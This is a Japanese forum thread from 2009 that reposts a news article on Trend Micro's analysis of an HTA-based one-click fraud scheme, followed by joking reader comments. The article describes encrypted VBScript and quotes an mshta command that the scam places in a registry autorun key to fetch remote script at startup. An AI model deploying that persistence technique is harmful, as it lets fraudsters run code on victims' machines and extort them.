【社会】アダルト動画を×ボタンで閉じたと思ったら、アダルトサイトに入会させられていた…ワンクリ詐欺の巧妙な仕組み明らかに

このエントリーをはてなブックマークに追加
1 ◆SCHearTCPU @胸のときめき(090414)φ ★
HTAファイルを悪用したワンクリック詐欺の新たな手口について、トレンドマイクロは7日、
検証した結果を同社ブログで公表し、その巧妙な仕組みを明らかにした。
この手口では、アダルトサイトで動画を閲覧しようとするとHTA形式のファイルがダウンロード。
これを実行してしまうと、画面にアダルト動画のウィンドウが表示され、マウスで
動かすことができなくなる。また、ウィンドウの右上にある「×」ボタンをクリックしても、
閉じるどころか請求画面を表示。以降、Windowsを再起動しても繰り返される。
同様の手口については、情報処理推進機構(IPA)も報告していた。
トレンドマイクロによれば、
このHTAファイルのソースには、実行時のウィンドウ内に表示される動画ページの転送先URLが
指定されており、ウィンドウの描画設定を細かく指定することで、ウィンドウを移動できなくしていた。
しかし、Windows起動時に動作するようなレジストリ改変コードなどは見あたらなかったという。
ところが、転送先URLのHTMLソースを見ると、「mshta http://<blocked>.com/regist2.php」と
いうコードをレジストリの自動実行キーに追加するVBScriptコードが、暗号化されたかたちで
埋め込まれていることがわかった。
ここで指定されている「mshta(mshta.exe)」は、Windowsに標準搭載されている正規の
システムファイルで、セキュリティゾーンを無効にした状態で指定のサイトへ
アクセスさせることができる。そのため、Internet Explorer上では本来ブロックされる
VBScriptコードも、「mshta.exe」経由でアクセスさせることで警告なしに実行されてしまうという。
これが、Windows起動時に表示されるウィンドウの正体である。
このほか、ウィンドウの「×」ボタンは実はGIFファイルで、「入会完了」画面に
誘導するリンクが指定されていることも判明した。
トレンドマイクロではこの手口の特徴として、1)EXEファイルより警戒するユーザーが
少ないと思われるHTAファイルを使っている、2)HTAの中で転送させるため、ダウンロードファイルの
ソースだけではレジストリを改変させる悪質なコードを確認できない、3)転送先のHTMLには、
暗号化されたVBScriptを使用し、人の目では動作が判別できないようにしている、
4)「mshta.exe」を利用し、警告を出すこと無くスクリプトコードを実行させている――
ことを挙げ、いかに巧妙かを指摘している。
トレンドマイクロによれば、HTAファイルを利用するワンクリック詐欺サイトをこれまでに
複数把握しているが、いずれも国内のサーバーで運営されているという。これらのサイトは、
すべてほぼ同じサイト構成であることも確認しており、「詐欺サイトを少ない工数で広く分散させ、
より多くの被害者を集めようとしていることがわかる」としている。

*+*+ Internet Watch 2009/04/09[19:46] +*+*
http://internet.watch.impress.co.jp/cda/news/2009/04/09/23089.html
2名前をあたえないでください:2009/04/09(木) 19:50:20 ID:Xq01p1K6
ありのまま(ry
3名前をあたえないでください:2009/04/09(木) 19:51:26 ID:RqzoC5ng
とりあえず、リンク先を・・
4名前をあたえないでください:2009/04/09(木) 19:52:47 ID:UgXZDAMK
ポルナレフ乙
5名前をあたえないでください:2009/04/09(木) 19:56:42 ID:EiBW01mC
movie funつかえよ
6名前をあたえないでください:2009/04/09(木) 20:04:48 ID:lDwpV0zg
犯罪行ってるサイトが特定出来るのになんで犯人はすぐに捕まえられないの?
2chで犯行予告するとすぐに捕まるのに
7名前をあたえないでください:2009/04/09(木) 20:07:19 ID:YyHLz6Zi
区別つくだろw
8名前をあたえないでください:2009/04/09(木) 20:10:54 ID:bXnATN1W
>7
口先だけですねわかります
9名前をあたえないでください:2009/04/09(木) 20:12:51 ID:nU5btZ9D
情弱は引っかかるから

引っかかってWindowsがは危ないって認識持った方が薬になるだろ
10名前をあたえないでください:2009/04/09(木) 20:15:59 ID:cazGYwdf
あはは

払わなきゃいいだけだよ
11名前をあたえないでください:2009/04/09(木) 20:17:29 ID:hrR+/YoW
ダイアルアップの接続が勝手に海外になった事ならある
パルスだったのですぐに気がついたぜ!
12名前をあたえないでください:2009/04/09(木) 20:25:32 ID:ss6CUDAP
ご入会ありがとうございます
つきましては入会金50000円を振り込んでください
万一振り込まれない場合は当社の社員がお伺いして請求します
その際出張費30000円が加算されます
                  XX学会
13名前をあたえないでください:2009/04/09(木) 20:39:53 ID:gJSi3FS9
アダルトなんて只、空しいだけだな。あとは、嫌な気分が残るだけ。
14名前をあたえないでください:2009/04/09(木) 21:13:59 ID:WQM4QzII
秘画、秘め事、秘事、秘がつくからこそ面白きまがごとを
開けっぴろげマンコ見せたらあきるわな
15名前をあたえないでください:2009/04/09(木) 21:30:39 ID:HRfNGeV4
MacOSで見に行っても、そういうところのは画像化されたWindowsのWindowが開くので、すぐにばれるというwww
16名前をあたえないでください:2009/04/09(木) 21:33:09 ID:TltTSlhd
Link先により、子供体型のエロゲ愛好者にはロクな奴が居ない事が判明。

江戸川区マンションの犯人もエロゲ愛好者。

【内閣府調査】「漫画イラストも児童ポルノ規制対象に」約9割★25
http://gimpo.2ch.net/test/read.cgi/news2/1239112118/

17名前をあたえないでください:2009/04/09(木) 21:40:29 ID:M0A1fp5B
入会させられていた…個人情報提供もしてないのに入会じゃないだろアホらしw
18名前をあたえないでください:2009/04/09(木) 21:44:29 ID:B+8MpSIw
>>12
ずいぶん安いな。草加じゃないことだけはたしかだ。
19名前をあたえないでください:2009/04/09(木) 21:49:26 ID:P3KbVWKw
まぁ結局払わなければ無問題
20名前をあたえないでください:2009/04/09(木) 22:29:44 ID:CAsuIUug
管理人名不明、内容類似、そっくりなデザイン・リンク・更新ペース
わざわざ別サイトにする意味がわからん
21名前をあたえないでください:2009/04/09(木) 23:13:08 ID:Zq2xD6vU
で、その消せなくなったウィンドウはどうすれば消えるの?
22名前をあたえないでください:2009/04/09(木) 23:36:43 ID:lPaH+GV8
この詐欺やった奴らを捕まえて、2億くらい請求したら良いと思うw
23名前をあたえないでください:2009/04/10(金) 01:13:49 ID:ICSxmzrU
クレジット・カードから金引き落とされるわけでもなし、
入会できたのならコンテンツ見放題だろ。
IPだけなら、どこの誰かもわからないから、請求も来ない。
こんなうまい話はないと思うんだが・・・
24名前をあたえないでください:2009/04/10(金) 09:42:13 ID:r/V5BdsH
もし引っ掛かったなら、そのサイトにある画像、動画をすべて見る事だな。どうせ金なんて払う必要ないんだし、無料サイトと何ら変わりないな。
25名前をあたえないでください:2009/04/10(金) 10:08:41 ID:uMP+Q8/3
無視しときゃいいんでないの?
26名前をあたえないでください:2009/04/10(金) 10:19:37 ID:zFRQFO3z
いろいろ考えるなー
27名前をあたえないでください:2009/04/10(金) 10:23:42 ID:zJBuIYbU
× ←ゆのっちの髪飾り
28名前をあたえないでください:2009/04/14(火) 16:38:37 ID:9Z6QJFc2
セリザワに逝かれました
ツークリってやつ

お前さんの情報は安全に保存されました。
例えば、使用機種・OS Ver・プロバイダ・IP以下省略。。。で?

しまいにゃブラウズソフトはmodzilaですねってかいてあたよ。

macなのに

やべ振り込み期限明日だよ



29名前をあたえないでください:2009/05/08(金) 08:25:49 ID:D4N+XtCR
これ、ひっかかったんだけど
まじで住所とか特定されてんの?
はらうべき?
30名前をあたえないでください:2009/05/08(金) 09:31:03 ID:uZ0pGKfW
これって、どこですか?  URL記載してよ。
31名前をあたえないでください:2009/05/08(金) 09:53:01 ID:xuYTc1lu
巧妙だな!

犯人は死刑でいいですよ
32名前をあたえないでください:2009/05/08(金) 10:08:28 ID:zVmgUQC/
俺累計3億くらいなはずなんだけど法的処置こないな。
なにさぼってんだ業者
33名前をあたえないでください:2009/05/08(金) 11:01:35 ID:/CMGbOX5
IPAの文字が出ると、俺の中での信用度が急降下。
えーと、おつまみ…。缶の底…。
34名前をあたえないでください:2009/05/08(金) 11:12:38 ID:hhbgDyVX
無視すりゃいいし、どうしても気になるんだったら
プロバイダ替えたらいいんでないの
35名前をあたえないでください:2009/05/09(土) 20:40:00 ID:knedn4Q7
オレオレ詐欺の日本のドンの模様がここに書いてあるから崇拝したまえ。
ちゃんと熟読するんだぞ。
http://hideyoshi.2ch.net/test/read.cgi/dqnplus/1234024819/l50
36名前をあたえないでください:2009/05/09(土) 21:21:44 ID:nb6Q5R/f
あげる
37名前をあたえないでください:2009/05/09(土) 21:50:47 ID:VnAb3zNJ
ALT+F4のキーで閉じる折れ様は勝ち組
38名前をあたえないでください
>>29
住所ばれてるぜ
地球に住んでるってバレバレだから早く金払ったほうがいいさ